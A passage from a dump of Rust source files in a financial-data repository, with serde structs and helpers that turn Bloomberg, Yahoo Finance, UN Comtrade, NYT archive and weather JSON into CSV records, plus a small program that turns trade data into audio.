self.id.to_string(),\n// self.word_count.to_string(),\n// orig.replace(\",\", \";\").to_string(),\n// self.pub_date.to_string(),\n// self.document_type.to_string(),\n// page.to_string(),\n// self.headline.main.replace(\",\", \";\").to_string(),\n// kicker.replace(\",\", \";\").to_string(),\n// snip.replace(\",\", \";\").to_string(),\n// abs_field.replace(\",\", \";\").to_string(),\n// self.web_url.to_string(),\n// self.source.to_string(),\n// ];\n// return rec;\n// }\n//}\n\n#[derive(Default, Debug, Clone, PartialEq, serde_derive::Serialize, serde_derive::Deserialize)]\n#[serde(rename_all = \"camelCase\")]\npub struct NYTArchiveHeadline {\n pub main: String,\n pub kicker: Option<String>,\n #[serde(rename = \"content_kicker\")]\n pub content_kicker: Option<String>,\n #[serde(rename = \"print_headline\")]\n pub print_headline: Option<String>,\n pub name: Option<serde_json::Value>,\n pub seo: Option<serde_json::Value>,\n pub sub: Option<serde_json::Value>,\n}\n\n#[derive(Default, Debug, Clone, PartialEq, serde_derive::Serialize, serde_derive::Deserialize)]\n#[serde(rename_all = \"camelCase\")]\npub struct Keyword {\n pub name: Option<String>,\n pub value: Option<String>,\n pub rank: Option<i64>,\n pub major: Option<String>,\n}\n\n#[derive(Default, Debug, Clone, PartialEq, serde_derive::Serialize, serde_derive::Deserialize)]\n#[serde(rename_all = \"camelCase\")]\npub struct Byline {\n pub original: Option<String>,\n #[serde(default)]\n pub person: Option<Vec<Person>>,\n pub organization: Option<String>,\n}\n\n#[derive(Default, Debug, Clone, PartialEq, serde_derive::Serialize, serde_derive::Deserialize)]\n#[serde(rename_all = \"camelCase\")]\npub struct Person {\n pub firstname: Option<String>,\n pub middlename: Option<String>,\n pub lastname: Option<String>,\n pub qualifier: Option<String>,\n pub title: Option<serde_json::Value>,\n pub role: String,\n pub organization: String,\n pub rank: i64,\n}\n\n//pub fn byline_orig(byline: Option<Byline>) -> String {\n// if let Some(byline) = byline {\n// return utils::lilmatcher(byline.original);\n// }\n// return \"\".to_string();\n//}\n\n/*\nadmin\narts\nautomobiles\nbooks\nbriefing\nbusiness\nclimate\ncorrections\ncrosswords \\u0026 games\neducation\nen español\nfashion\nfood\nguides\nhealth\nhome \\u0026 garden\nhome page\njob market\nlens\nmagazine\nmovies\nmultimedia/photos\nnew york\nobituaries\nopinion\nparenting\npodcasts\nreader center\nreal estate\nscience\nsmarter living\nsports\nstyle\nsunday review\nt brand\nt magazine\ntechnology\nthe learning network\nthe upshot\nthe weekly\ntheater\ntimes insider\ntoday’s paper\ntravel\nu.s.\nuniversal\nvideo\nwell\nworld\nyour money\n\n*/\n" }, { "alpha_fraction": 0.6275604963302612, "alphanum_fraction": 0.6288020014762878, "avg_line_length": 26.775861740112305, "blob_id": "cb74939f4984c0a7548d23d927d79f37c0a34233", "content_id": "6814756c72469f25cb4d8b318add5aaa93ddd3b7", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Rust", "length_bytes": 1611, "license_type": "no_license", "max_line_length": 95, "num_lines": 58, "path": "/finox/src/misc/uncomtrade.rs", "repo_name": "adamkeller2000/sipfin", "src_encoding": "UTF-8", "text": "extern crate serde;\nextern crate serde_derive;\nextern crate serde_json;\nextern crate csv;\n\n#[derive(Default, Debug, Clone, PartialEq, serde_derive::Serialize, serde_derive::Deserialize)]\n#[serde(rename_all = \"camelCase\")]\npub struct ResMeta {\n pub more: bool,\n pub minimum_input_length: i64,\n pub class_code: String,\n pub class_name: String,\n pub results: Vec<MetaResult>,\n}\n\nimpl ResMeta {\n pub fn to_records(&self) -> Vec<csv::StringRecord> {\n let mut recs: Vec<csv::StringRecord> = Vec::new();\n for elt in self.results.iter(){\n recs.push(MetaResult::to_record(elt));\n }\n return recs;\n }\n}\n\n#[derive(Default, Debug, Clone, PartialEq, serde_derive::Serialize, serde_derive::Deserialize)]\n#[serde(rename_all = \"camelCase\")]\npub struct MetaResult {\n pub id: String,\n pub text: String,\n pub parent: String,\n}\n\nimpl MetaResult {\n pub fn to_record(&self) -> csv::StringRecord {\n let text = self.text.replace(\",\", \";\");\n let rec = &[\n self.id.to_string(),\n text.to_string(),\n self.parent.to_string(),\n ];\n return csv::StringRecord::from(rec.to_vec());\n }\n}\n\n#[derive(Default, Debug, Clone, PartialEq, serde_derive::Serialize, serde_derive::Deserialize)]\n#[serde(rename_all = \"camelCase\")]\npub struct Areas {\n pub more: bool,\n pub results: Vec<AreaResult>,\n}\n\n#[derive(Default, Debug, Clone, PartialEq, serde_derive::Serialize, serde_derive::Deserialize)]\n#[serde(rename_all = \"camelCase\")]\npub struct AreaResult {\n pub id: String,\n pub text: String,\n}\n" }, { "alpha_fraction": 0.5634357929229736, "alphanum_fraction": 0.5823482871055603, "avg_line_length": 27.200000762939453, "blob_id": "798edc4e3761d242aeb3fe445e0a02361bbd964c", "content_id": "62b02842b27c05e9a45f3d7eb09428538bd7dc94", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Rust", "length_bytes": 1269, "license_type": "no_license", "max_line_length": 95, "num_lines": 45, "path": "/listen/src/main.rs", "repo_name": "adamkeller2000/sipfin", "src_encoding": "UTF-8", "text": "use csv;\nuse finox::roses;\nuse hound;\nuse std::error::Error;\nuse std::f32::consts::PI;\nuse std::i16;\n\n#[derive(Default, Debug, Clone, PartialEq, serde_derive::Serialize, serde_derive::Deserialize)]\n#[serde(rename_all = \"camelCase\")]\npub struct Row {\n pub symbol: String,\n pub t: String,\n pub x: f64,\n pub v: u64,\n}\n\nfn main() -> Result<(), hound::Error> {\n //let strs = roses::read_tickers(\"../ref_data/tickers_stocks.txt\");\n //for s in strs.iter() {\n do_one(\"SPY\").unwrap();\n //}\n Ok(())\n}\n\nfn do_one(s: &str) -> Result<(), Box<dyn Error>> {\n let spec = hound::WavSpec {\n channels: 1,\n sample_rate: 44100,\n bits_per_sample: 16,\n sample_format: hound::SampleFormat::Int,\n };\n let file_name = format!(\"../data/nasdaq/realtime-trades/{}.csv\", s);\n let output_name = format!(\"../data/sound/{}.wav\", s);\n //let mut rdr = csv::Reader::from_path().unwrap();\n //let mut iter = rdr.deserialize();\n let rows = roses::read_into::<Row>(file_name);\n\n let mut wtr = hound::WavWriter::create(output_name, spec).unwrap();\n for r in rows {\n let sample = r.x * r.v as f64;\n let amplitude = i16::MAX as f32;\n wtr.write_sample((sample * amplitude) as i16).unwrap();\n }\n Ok(())\n}\n" }, { "alpha_fraction": 0.5664610266685486, "alphanum_fraction": 0.5698261260986328, "avg_line_length": 25.22058868408203, "blob_id": "62b86d903fcb88ca627bd5c8446c5bb3d9b385e2", "content_id": "a5976d0f54173883b4382a30433a88e2f7f42d73", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Rust", "length_bytes": 1783, "license_type": "no_license", "max_line_length": 95, "num_lines": 68, "path": "/finox/src/misc/weather.rs", "repo_name": "adamkeller2000/sipfin", "src_encoding": "UTF-8", "text": "extern crate csv;\nextern crate serde;\nextern crate serde_derive;\nextern crate serde_json;\nuse std::fs;\nuse crate::utils;\n\n#[derive(Default, Debug, Clone, PartialEq, serde_derive::Serialize, serde_derive::Deserialize)]\n#[serde(rename_all = \"camelCase\")]\npub struct Root {\n pub id: i64,\n pub name: String,\n pub state: String,\n pub country: String,\n pub coord: Coord,\n}\nimpl Root {\n pub fn to_record(&self) -> Vec<String> {\n let mut rec: Vec<String> = vec!(\n self.id.to_string(),\n self.name.to_string(),\n self.state.to_string(),\n self.country.to_string(),\n );\n rec.append(&mut Coord::to_record(&self.coord));\n\n return rec;\n }\n}\n\n#[derive(Default, Debug, Clone, PartialEq, serde_derive::Serialize, serde_derive::Deserialize)]\n#[serde(rename_all = \"camelCase\")]\npub struct Coord {\n pub lon: f64,\n pub lat: f64,\n}\n\nimpl Coord {\n pub fn to_record(&self) -> Vec<String> {\n return vec![self.lat.to_string(), self.lon.to_string()];\n }\n}\n\n\npub fn cities_to_csv() -> Result<(), csv::Error> {\n let mut wtr = csv::Writer::from_path(\"city_list.csv\".to_string())?;\n let jsonstr = fs::read_to_string(\"city_list.json\")\n .expect(\"Something went wrong reading the file\");\n let roots: Vec<Root> = serde_json::from_str(&jsonstr.to_string()).unwrap();\n let recs: Vec<csv::StringRecord> = roots\n .into_iter()\n .map(|x| csv::StringRecord::from(Root::to_record(&x)))\n .collect();\n wtr.write_record(vec!(\n \"id\",\n \"name\",\n \"state\",\n \"country\",\n \"lat\",\n \"lon\",\n ));\n for r in recs.iter() {\n wtr.write_record(r);\n }\n wtr.flush()?;\n println!(\"With text:\\n{:#?}\", recs);\n Ok(())\n}\n" }, { "alpha_fraction": 0.595245361328125, "alphanum_fraction": 0.5958549380302429, "avg_line_length": 33.16666793823242, "blob_id": "a477e183116e1dd957def04a2f7e623f512c5d40", "content_id": "057c423e50c337743b5e96d297499098224cd133", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Rust", "length_bytes": 3281, "license_type": "no_license", "max_line_length": 98, "num_lines": 96, "path": "/finox/src/misc/misc.rs", "repo_name": "adamkeller2000/sipfin", "src_encoding": "UTF-8", "text": "\n// #[derive(Default, Debug, Clone, PartialEq, serde_derive::Serialize, serde_derive::Deserialize)]\n// #[serde(rename_all = \"camelCase\")]\n// pub struct Collections {\n// pub field_data_collection: Vec<FieldDataCollection>,\n// }\n\n// #[derive(Default, Debug, Clone, PartialEq, serde_derive::Serialize, serde_derive::Deserialize)]\n// #[serde(rename_all = \"camelCase\")]\n// pub struct FieldDataCollection {\n// pub id: String,\n// pub issued_currency: String,\n// pub long_name: String,\n// pub price: String,\n// pub price_change1_day: String,\n// pub percent_change1_day: String,\n// #[serde(rename = \"tradingDayCloseUTC\")]\n// pub trading_day_close_utc: String,\n// #[serde(rename = \"lastUpdateUTC\")]\n// pub last_update_utc: String,\n// #[serde(rename = \"MEDIA_SECURITY_TYPE\")]\n// pub media_security_type: String,\n// #[serde(rename = \"MEDIA_SECURITY_SUBTYPE\")]\n// pub media_security_subtype: String,\n// pub security_type: String,\n// pub short_name: String,\n// pub commodity_contract_date: String,\n// pub price_date: String,\n// pub last_update_time: String,\n// #[serde(rename = \"lastUpdateISO\")]\n// pub last_update_iso: String,\n// pub user_time_zone: String,\n// pub market_open: bool,\n// pub commodity_units: Option<String>,\n// }\n\n// pub fn hs_and_st() -> Result<(), reqwest::Error> {\n// let url = \"https://comtrade.un.org/Data/cache/classificationST.json\";\n// let write_fn = \"st.csv\";\n// // \"https://comtrade.un.org/Data/cache/classificationST.json\"];\n// // for url in urls.iter() {\n// if let Ok(body) = getters::simple_get(url.to_string()) {\n// let res: uncomtrade::ResMeta = serde_json::from_str(&body.to_string()).unwrap();\n// let recs = uncomtrade::ResMeta::to_records(&res);\n// writerecs(write_fn.to_string(), &[\"id\", \"text\", \"parent\"], recs);\n// }\n// Ok(())\n// }\n\n\n\n\n\n//#[derive(Default, Debug, Clone, PartialEq, serde_derive::Serialize, serde_derive::Deserialize)]\n//#[serde(rename_all = \"camelCase\")]\n//pub struct NewsVec {\n// pub news: Vec<News>,\n//}\n//\n//impl NewsVec {\n// pub fn to_records(&self) -> Result<Vec<csv::StringRecord>, csv::Error> {\n// let mut ret: Vec<csv::StringRecord> = Vec::new();\n// for article in self.news.iter() {\n// ret.push(News::to_record(article));\n// }\n// Ok(ret)\n// }\n//}\n//\n//#[derive(Default, Debug, Clone, PartialEq, serde_derive::Serialize, serde_derive::Deserialize)]\n//#[serde(rename_all = \"camelCase\")]\n//pub struct News {\n// pub headline: String,\n// pub published_at: String,\n// pub url: String,\n// #[serde(rename = \"publishedAtISO\")]\n// pub published_at_iso: String,\n//}\n//\n//impl News {\n// pub fn to_record(&self) -> csv::StringRecord {\n// let hl_text = self.headline.replace(\",\", \";\");\n// let rec = &[\n// self.url.to_string(),\n// hl_text.to_string(),\n// self.published_at.to_string(),\n// ];\n// return csv::StringRecord::from(rec.to_vec());\n// }\n//}\n//\n//#[derive(Default, Debug, Clone, PartialEq, serde_derive::Serialize, serde_derive::Deserialize)]\n//#[serde(rename_all = \"camelCase\")]\n//pub struct Channel {\n// pub path: String,\n// pub name: String,\n//}\n" }, { "alpha_fraction": 0.5343283414840698, "alphanum_fraction": 0.5641791224479675, "avg_line_length": 32.5, "blob_id": "b32df3629779ab542393d2ddfa8be51952a57ee4", "content_id": "f55ac4eea6669341935bc7416a6c6417e8dd0ef6", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Rust", "length_bytes": 1675, "license_type": "no_license", "max_line_length": 118, "num_lines": 50, "path": "/finox/src/bin/yf.rs", "repo_name": "adamkeller2000/sipfin", "src_encoding": "UTF-8", "text": "extern crate chrono;\nextern crate reqwest;\nextern crate tokio;\n\nuse std::{collections::HashMap, env};\n\n//let symbs: Vec<&str> = finox::headers::CURRENCY_SYMBOLS_YF.to_vec(); //.into_iter().cloned().collect();\n//let t = epoch_str();\n//let urls = gen_yfx_urls(symbs);\n//https://query1.finance.yahoo.com/v8/finance/chart/GOOG?lang=en-US&region=US&interval=1d&period1=0&period2=1590451200\n\n#[tokio::main]\nasync fn main() -> Result<(), Box<dyn std::error::Error>> {\n /* args:\n * 1: one in ['stocks', 'commodities', 'currencies']\n */\n\n let args = env::args().collect::<Vec<String>>();\n let (tickers, headers) = finox::gen_secs(&args[1]);\n let mut hm: HashMap<String, String> = HashMap::new();\n for symb in tickers.iter() {\n hm.insert(symb.to_string(), symb.to_yf());\n }\n if let Ok(recs) = finox::fetch_write::<finox::yf::YFRoot>(hm, \"../data/yf/\", headers).await {\n println!(\"{:#?}\", recs);\n }\n Ok(())\n}\n\n// TODO look into the correct pattern for interlacing like this\npub fn gen_yfx_urls(symbs: Vec<&str>) -> Vec<String> {\n let len = symbs.len();\n let mut urls: Vec<String> = vec![];\n for (i, x) in symbs.iter().enumerate() {\n for y in symbs[i..len].iter() {\n if x == y {\n continue;\n };\n urls.push(\n format!(\n //\"https://query2.finance.yahoo.com/v8/finance/chart/{}=F?interval=1d&period1=0&period2=1589932800\",\n \"https://query1.finance.yahoo.com/v8/finance/chart/{}{}=X?interval=1d&period1=0&period2=1589932800\",\n x.to_string(),\n y.to_string()\n )\n );\n }\n }\n urls\n}\n" }, { "alpha_fraction": 0.5717771053314209, "alphanum_fraction": 0.5811015963554382, "avg_line_length": 38.33049011230469, "blob_id": "03a74470fbaf21ca6958cfd9f89909f830a6f2af", "content_id": "5cc56e32cc87469e837c74c90bf4a094c7c81b9e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Rust", "length_bytes": 18446, "license_type": "no_license", "max_line_length": 228, "num_lines": 469, "path": "/finox/src/news/bloomberg.rs", "repo_name": "adamkeller2000/sipfin", "src_encoding": "UTF-8", "text": "extern crate csv;\nextern crate serde;\nextern crate serde_derive;\nextern crate serde_json;\nuse crate::news;\n/*\ntodo\nfn dash() -> Result<(), reqwest::Error> {\nlet symbs = vec![\"commodities\", \"futures\", \"asia\", \"americas\", \"europe\"];\nlet dashboard_root = \"https://www.bloomberg.com/markets/api/data-dashboard/tileset/\";\nhttps://www.bloomberg.com/markets2/api/report/income/EQT/MSFT%3AUS/annual?locale=en&currency=USD\nhttps://www.bloomberg.com/markets/api/security/currency/cross-rates/USD,EUR\nhttps://www.bloomberg.com/markets2/api/people/2029055\nhttps://www.bloomberg.com/markets2/api/peopleForCompany/101743\nhttps://www.bloomberg.com/markets/api/sectors/S5INFT%3AIND?locale=en\nhttps://www.bloomberg.com/markets2/api/history/MSFT%3AUS/PX_LAST?timeframe=5_YEAR&period=daily&volumePeriod=daily\nhttps://www.bloomberg.com/markets2/api/history/CL1%3ACOM/PX_LAST?timeframe=5_YEAR&period=daily&volumePeriod=daily\nhttps://www.bloomberg.com/markets/api/comparison/news?securityType=GOVERNMENT_BOND&limit=1000&locale=en\nanotha SP1:IND,DM1:IND,SX5E:IND,UKX:IND,DAX:IND,NKY:IND,SHCOMP:IND,SPX:IND,RTY:IND,DXY:CUR,USDJPY:CUR,EURUSD:CUR,XAU:CUR,USGG10YR:IND,USGG2YR:IND,LEGATRUU:IND,CL1:COM,CO1:COM\nhttps://www.bloomberg.com/bbg-gfx/bgreen-widget-data/dashboard-data.json\nhttps://oec.world/en/profile/country/arg/\nhttps://api.nasdaq.com/api/quote/watchlist?symbol=cl%3anmx%7ccommodities&symbol=ho%3anmx%7ccommodities&symbol=rb%3anmx%7ccommodities&symbol=ng%3anmx%7ccommodities&symbol=bz%3anmx%7ccommodities&symbol=eh%7ccommodities\nhttps://www.bloomberg.com/markets/api/security/currency/cross-rates/USD,EUR,XAU,XAG,XPT,XPD,JPY,GBP,AUD,CAD,CHF,KRW,MXN,BRL,CLP,COP,PEN,CRC,ARS,SEK,DKK,NOK,CZK,SKK,PLN,HUF,RUB,TRY,ILS,KES,ZAR,MAD,NZD,PHP,SGD,IDR,CNY,INR,MYR,THB,\n}\n*/\n// pub fn currencies_intraday(start: String) -> Result<(), reqwest::Error> {\n// let urls = currency_urls();\n// for url in urls.iter() {\n// if let Some(curs) = get_intraday_or_history(url.to_string()) {\n// let prices_fn = format!(\"./data/{}_intraday_prices.csv\", url.to_string());\n// if let Ok(recs) = Intraday::price_records(&curs[0]) {\n// utils::writerecs(prices_fn, &[\"date_time\", &curs[0].ticker.to_string()], recs);\n// }\n// } else {\n// println!(\"currency route missing: {}\", url.to_string());\n// continue;\n// }\n// }\n// Ok(())\n// }\n\n// pub fn currencies_history(start: String) -> Result<(), reqwest::Error> {\n// let index = CURRENCY_SYMBOLS\n// .iter()\n// .position(|r| r.to_string() == start.to_string())\n// .unwrap();\n\n// let todo_symbs = &CURRENCY_SYMBOLS[index..CURRENCY_SYMBOLS.len()];\n// for s1 in todo_symbs.iter() {\n// for s2 in CURRENCY_SYMBOLS.iter() {\n// if s1 == s2 {\n// continue;\n// }\n// let symb = format!(\"{}{}%3ACUR\", s1.to_string(), s2.to_string());\n// if let Some(curs) = get_history(symb.to_string()) {\n// let prices_fn = format!(\"./data/{}_history_prices.csv\", symb.to_string());\n// if let Ok(recs) = Intraday::price_records(&curs[0]) {\n// utils::writerecs(prices_fn, &[\"date_time\", &curs[0].ticker.to_string()], recs);\n// }\n// } else {\n// println!(\"currency route missing: {}\", symb.to_string());\n// continue;\n// }\n// }\n// }\n// Ok(())\n// }\n\n// pub fn commodities_prices(start: String) -> Result<(), reqwest::Error> {\n// let index = COMMODITIES_SYMBOLS\n// .iter()\n// .position(|r| r.to_string() == start.to_string())\n// .unwrap();\n\n// let todo_symbs = &COMMODITIES_SYMBOLS[index..COMMODITIES_SYMBOLS.len()];\n// for s in todo_symbs.iter() {\n// if let Some(hist) = get_history(format!(\"{}%3ACOM\", s.to_string())) {\n// if let Ok(prices) = Intraday::price_records(&hist[0]) {\n// let prices_fn = format!(\"./data/{}_prices.csv\", s.to_string());\n// let price_col = format!(\"{}_price\", &s.to_string());\n// utils::writerecs(prices_fn, &[\"date_time\", &price_col], prices);\n// }\n// if let Ok(volume) = Intraday::volume_records(&hist[0]) {\n// let volume_fn = format!(\"./data/{}_volume.csv\", s.to_string());\n// let vol_col = format!(\"{}_volume\", &s.to_string());\n// utils::writerecs(volume_fn, &[\"date_time\", &vol_col], volume);\n// }\n// }\n// }\n// Ok(())\n// }\n\n// pub fn commodities_intraday() -> Result<(), reqwest::Error> {\n// // let index = COMMODITIES_SYMBOLS\n// // .iter()\n// // .position(|r| r.to_string() == start.to_string())\n// // .unwrap();\n\n// // let todo_symbs = &COMMODITIES_SYMBOLS[index..COMMODITIES_SYMBOLS.len()];\n// for s in COMMODITIES_SYMBOLS.iter() {\n// if let Some(hist) = get_history(format!(\"{}%3ACOM\", s.to_string())) {\n// if let Ok(prices) = Intraday::price_records(&hist[0]) {\n// let prices_fn = format!(\"./data/{}_intraday_prices.csv\", s.to_string());\n// let price_col = format!(\"{}_price\", &s.to_string());\n// utils::writerecs(prices_fn, &[\"date_time\", &price_col], prices);\n// }\n// if let Ok(volume) = Intraday::volume_records(&hist[0]) {\n// let volume_fn = format!(\"./data/{}_intraday_volume.csv\", s.to_string());\n// let vol_col = format!(\"{}_volume\", &s.to_string());\n// utils::writerecs(volume_fn, &[\"date_time\", &vol_col], volume);\n// }\n// }\n// }\n// Ok(())\n// }\n\npub const PRICE_HEADER: [&'static str; 2] = [\"date_time\", \"price\"];\npub const NEWS_HEADER: [&'static str; 3] = [\"url\", \"headline\", \"date_time\"];\npub const HEADLINES_HEADER: [&'static str; 4] = [\"id\", \"url\", \"headline\", \"lastmod\"];\n\npub fn news() -> Result<(), csv::Error> {\n let write_fn = \"./ref_data/news.csv\";\n let mut wtr = csv::Writer::from_path(&write_fn)?;\n wtr.write_record(&NEWS_HEADER);\n for s in headers::NEWS_SYMBOLS.iter() {\n if let Some(news_vec) = get_news(s.to_string()) {\n if let Ok(recs) = news::NewsVec::to_records(&news_vec) {\n for r in recs.iter() {\n wtr.write_record(r);\n }\n }\n }\n }\n wtr.flush();\n\n Ok(())\n}\n\npub fn sp500(start: String, write_header: bool) -> Result<(), csv::Error> {\n let symbs = roses::read_tickers(\"./ref_data/sp500tickers.txt\");\n let index = symbs\n .iter()\n .position(|r| r.to_string() == start.to_string())\n .unwrap();\n\n let todo_symbs = &symbs[index..symbs.len()];\n\n let headlines_fn = \"../ref_data/sp500_headlines.csv\".to_string();\n let mut lines_wtr = csv::Writer::from_path(&headlines_fn)?;\n lines_wtr.write_record(&HEADLINES_HEADER);\n for s in todo_symbs.iter() {\n let symb = format!(\"{}%3AUS\", s.to_string());\n if let Some(c) = get_datastrip(symb.to_string()) {\n if let Ok(headlines) = Root::to_headlines(&c[0]) {\n for r in headlines.iter() {\n lines_wtr.write_record(r);\n }\n }\n }\n }\n lines_wtr.flush();\n Ok(())\n}\n\n// pub fn stock_prices(start: String) -> Result<(), reqwest::Error> {\n// let symbs = utils::read_tickers(\"./data/sp500tickers.txt\");\n// let index = symbs\n// .iter()\n// .position(|r| r.to_string() == start.to_string())\n// .unwrap();\n\n// let todo_symbs = &symbs[index..symbs.len()];\n// for s in todo_symbs.iter() {\n// if let Some(hist) = get_history(format!(\"{}%3AUS\", s.to_string())) {\n// if let Ok(recs) = Intraday::price_records(&hist[0]) {\n// let write_fn = format!(\"./data/{}_stock_history_price.csv\", s.to_string());\n// let price_col = format!(\"{}_price\", &s.to_string());\n// utils::writerecs(write_fn, &[\"date_time\", &price_col], recs);\n// }\n// if let Ok(recs) = Intraday::volume_records(&hist[0]) {\n// let write_fn = format!(\"./data/{}_stock_history_vol.csv\", s.to_string());\n// let vol_col = format!(\"{}_volume\", &s.to_string());\n// utils::writerecs(write_fn, &[\"date_time\", &vol_col], recs);\n// }\n// }\n// }\n// Ok(())\n// }\n// pub fn stock_intraday(start: String) -> Result<(), reqwest::Error> {\n// let symbs = utils::read_tickers(\"./data/sp500tickers.txt\");\n// let index = symbs\n// .iter()\n// .position(|r| r.to_string() == start.to_string())\n// .unwrap();\n\n// let todo_symbs = &symbs[index..symbs.len()];\n// for s in todo_symbs.iter() {\n// let symb = format!(\"{}%3AUS\", s.to_string());\n// if let Some(hist) = get_intraday_or_history(symb.to_string()) {\n// if let Ok(recs) = Intraday::price_records(&hist[0]) {\n// let write_fn = format!(\"./data/{}_stock_intraday_price.csv\", s.to_string());\n// let price_col = format!(\"{}_price\", &s.to_string());\n// utils::writerecs(write_fn, &[\"date_time\", &price_col], recs);\n// }\n// if let Ok(recs) = Intraday::volume_records(&hist[0]) {\n// let write_fn = format!(\"./data/{}_stock_intraday_vol.csv\", s.to_string());\n// let vol_col = format!(\"{}_volume\", &s.to_string());\n// utils::writerecs(write_fn, &[\"date_time\", &vol_col], recs);\n// }\n// }\n// }\n// Ok(())\n// }\n\npub fn currency_urls() -> Vec<String> {\n let mut urls: Vec<String> = Vec::new();\n for s1 in headers::BLOOMBERG_CURRENCY_SYMBOLS.iter() {\n for s2 in headers::BLOOMBERG_CURRENCY_SYMBOLS.iter() {\n if s1 == s2 {\n continue;\n }\n let symb = format!(\"{}{}:CUR\", s1.to_string(), s2.to_string());\n\n urls.push(bloomberg_url(utils::Security::X(symb)));\n }\n }\n return urls;\n}\n\npub fn us_tickers() -> Vec<String> {\n let urls = utils::read_tickers(\"./ref_data/tickers.txt\")\n .iter()\n .map(|x| bloomberg_url(utils::Security::US(format!(\"{}:US\", x))))\n .collect();\n println!(\"{:#?}\", urls);\n return urls;\n}\n\npub fn bloomberg_url(s: utils::Security) -> String {\n let root = \"https://www.bloomberg.com/\";\n\n let intra_prefix = \"markets2/api/intraday/\";\n let intra_sfx = \"?days=10&interval=0&volumeInterval=0\";\n\n // https://www.bloomberg.com/markets2/api/intraday/USDJPY%3ACUR?days=10&interval=0&volumeInterval=0\n // let hist_prefix = \"markets2/api/history/\";\n // \"&limit=1000\"\n // let news_prefix\"/markets/api/comparison/news?securityType=\"\n // let news_sfx \"/PX_LAST?timeframe=5_YEAR&period=daily&volumePeriod=daily\"\n\n match s {\n utils::Security::F(s) => vec![root, intra_prefix, &s, intra_sfx].join(\"\"),\n utils::Security::X(s) => vec![root, intra_prefix, &s, intra_sfx].join(\"\"),\n utils::Security::US(s) => vec![root, intra_prefix, &s, intra_sfx].join(\"\"),\n }\n}\n\n#[derive(Default, Debug, Clone, PartialEq, serde_derive::Serialize, serde_derive::Deserialize)]\n#[serde(rename_all = \"camelCase\")]\npub struct Root {\n pub average_days_to_maturity: ::serde_json::Value,\n pub average_volume30_day: ::serde_json::Value,\n pub back_load_fee: ::serde_json::Value,\n pub bbid: String,\n pub bics_industry: String,\n pub bics_sector: String,\n pub bics_sub_industry: String,\n pub co_fund_manager: ::serde_json::Value,\n pub company_address: String,\n pub company_description: String,\n pub company_is_private: bool,\n pub company_phone: ::serde_json::Value,\n pub company_website: ::serde_json::Value,\n pub current_management_fee: ::serde_json::Value,\n pub dividend: ::serde_json::Value,\n pub earnings_announcement: ::serde_json::Value,\n pub earnings_per_share: ::serde_json::Value,\n pub price_earnings_to_growth_and_dividend_yield_ratio: ::serde_json::Value,\n pub expense_ratio: ::serde_json::Value,\n pub founded_year: ::serde_json::Value,\n pub front_load_fee: ::serde_json::Value,\n pub fundamental_data_currency: String,\n pub fund_asset_class_focus: ::serde_json::Value,\n pub fund_geographic_focus: ::serde_json::Value,\n pub fund_manager: ::serde_json::Value,\n pub fund_marketing_fee: ::serde_json::Value,\n pub fund_objective: ::serde_json::Value,\n pub fund_type: ::serde_json::Value,\n pub gics_industry: i64,\n pub gics_sector: i64,\n pub high_price: f64,\n pub high_price52_week: f64,\n pub id: String,\n pub inception_date: ::serde_json::Value,\n pub index_description: ::serde_json::Value,\n pub index_source: ::serde_json::Value,\n pub indicated_gross_dividend_yield: ::serde_json::Value,\n pub is_open: bool,\n pub issued_currency: String,\n pub last_announcement_period: String,\n pub last_dividend_reported: ::serde_json::Value,\n pub last_update: String,\n pub long_name: String,\n pub low_price: f64,\n pub low_price52_week: f64,\n pub market_cap: f64,\n pub market_status: String,\n pub media_security_type: String,\n pub media_security_subtype: String,\n pub name: String,\n pub net_asset_value: ::serde_json::Value,\n pub net_asset_value_date: ::serde_json::Value,\n pub next_earnings_announcement: ::serde_json::Value,\n pub next_earnings_period: ::serde_json::Value,\n pub next_earnings_period_end: ::serde_json::Value,\n pub number_of_employees: ::serde_json::Value,\n pub open_price: f64,\n pub parent_ticker: String,\n pub percent_premium: ::serde_json::Value,\n pub percent_premium52_week_average: ::serde_json::Value,\n pub percent_change1_day: f64,\n pub periodicity: ::serde_json::Value,\n pub previous_closing_price_one_trading_day_ago: f64,\n pub price: f64,\n pub price_change1_day: f64,\n pub price_earnings_ratio: ::serde_json::Value,\n pub price_min_decimals: i64,\n pub price_to_book_ratio: ::serde_json::Value,\n pub price_to_sales_ratio: ::serde_json::Value,\n pub primary_exchange: String,\n pub redemption_fee: ::serde_json::Value,\n pub score: ::serde_json::Value,\n pub security_name: ::serde_json::Value,\n pub share_class: ::serde_json::Value,\n pub shares_outstanding: i64,\n pub short_name: String,\n pub time_zone_offset: i64,\n pub total_assets: ::serde_json::Value,\n pub total_assets_date: ::serde_json::Value,\n pub total_assets_currency: ::serde_json::Value,\n pub total_return1_year: ::serde_json::Value,\n pub total_return3_month: ::serde_json::Value,\n pub total_return3_year: ::serde_json::Value,\n pub total_return5_year: ::serde_json::Value,\n pub total_return_ytd: ::serde_json::Value,\n pub trading_day_close: String,\n #[serde(rename = \"type\")]\n pub type_field: String,\n pub ultimate_parent_ticker: String,\n pub volume: i64,\n pub press_releases: Option<Vec<PressRelease>>,\n}\n\nimpl Root {\n pub fn to_rec(&self) -> Vec<String> {\n vec![\n self.id.to_string(),\n self.short_name.to_string(),\n self.market_cap.to_string(),\n self.company_phone.to_string(),\n self.last_update.to_string(),\n self.average_volume30_day.to_string(),\n self.price.to_string(),\n self.open_price.to_string(),\n self.high_price.to_string(),\n self.low_price.to_string(),\n self.low_price52_week.to_string(),\n self.high_price52_week.to_string(),\n self.number_of_employees.to_string(),\n self.price_earnings_ratio.to_string(),\n self.shares_outstanding.to_string(),\n ]\n }\n\n pub fn to_headlines(&self) -> Result<Vec<csv::StringRecord>, &'static str> {\n let mut ret: Vec<csv::StringRecord> = Vec::new();\n if let Some(prs) = &self.press_releases {\n for pr in prs.iter() {\n ret.push(pr.to_rec());\n }\n Ok(ret)\n } else {\n Err(\"no headlines most likely\")\n }\n }\n}\n\n#[derive(Default, Debug, Clone, PartialEq, serde_derive::Serialize, serde_derive::Deserialize)]\n#[serde(rename_all = \"camelCase\")]\npub struct PressRelease {\n pub id: String,\n pub url: String,\n pub headline: Headline,\n pub updated_at: String,\n}\n\nimpl PressRelease {\n pub fn to_rec(&self) -> Vec<String> {\n vec![\n self.id.to_string(),\n self.url.to_string(),\n self.headline.to_string(),\n 